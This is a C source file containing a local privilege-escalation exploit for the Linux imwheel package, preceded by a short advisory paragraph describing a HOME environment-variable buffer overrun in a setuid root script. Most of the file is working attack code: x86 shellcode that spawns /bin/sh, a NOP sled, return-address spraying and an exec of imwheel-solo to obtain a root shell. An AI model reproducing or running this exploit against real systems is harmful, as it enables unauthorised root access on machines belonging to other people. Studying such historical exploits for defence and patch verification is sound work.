39 lines
No EOL
1.3 KiB
C
39 lines
No EOL
1.3 KiB
C
// source: https://www.securityfocus.com/bid/1060/info
|
|
|
|
A vulnerability exists in the 'imwheel' package for Linux. This package is known to be vulnerable to a buffer overrun in its handling of the HOME environment variable. By supplying a sufficiently long string containing machine executable code, the imwheel program can be caused to run arbitrary commands as root. This is due to a setuid root perl script named 'imwheel-solo' which invokes the imwheel program with effective UID 0.
|
|
|
|
/*
|
|
* imwheel local root exploit [ RHSA-2000:016-02 ]
|
|
* funkysh 04/2000 funkysh@kris.top.pl
|
|
*/
|
|
|
|
#include <stdlib.h>
|
|
#include <stdio.h>
|
|
|
|
#define BUFFER 2070
|
|
#define NOP 0x90
|
|
#define PATH "/usr/X11R6/bin/imwheel-solo"
|
|
|
|
char code[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46"
|
|
"\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
|
|
"\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
|
|
"\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
|
|
|
|
unsigned long getesp(void) { __asm__("movl %esp,%eax"); }
|
|
|
|
int main(int argc, char *argv[])
|
|
{
|
|
int i, offset = 0;
|
|
char buf[BUFFER];
|
|
long address;
|
|
if(argc > 1) offset = atoi(argv[1]);
|
|
address = getesp() + 1000 + offset;
|
|
memset(buf,NOP,BUFFER);
|
|
memcpy(buf+(BUFFER-300),code,strlen(code));
|
|
|
|
for(i=(BUFFER-250);i<BUFFER;i+=4)
|
|
*(int *)&buf[i]=address;
|
|
setenv("DISPLAY", "DUPA", 1);
|
|
setenv("HOME", buf, 1);
|
|
execl(PATH, PATH, 0);
|
|
} |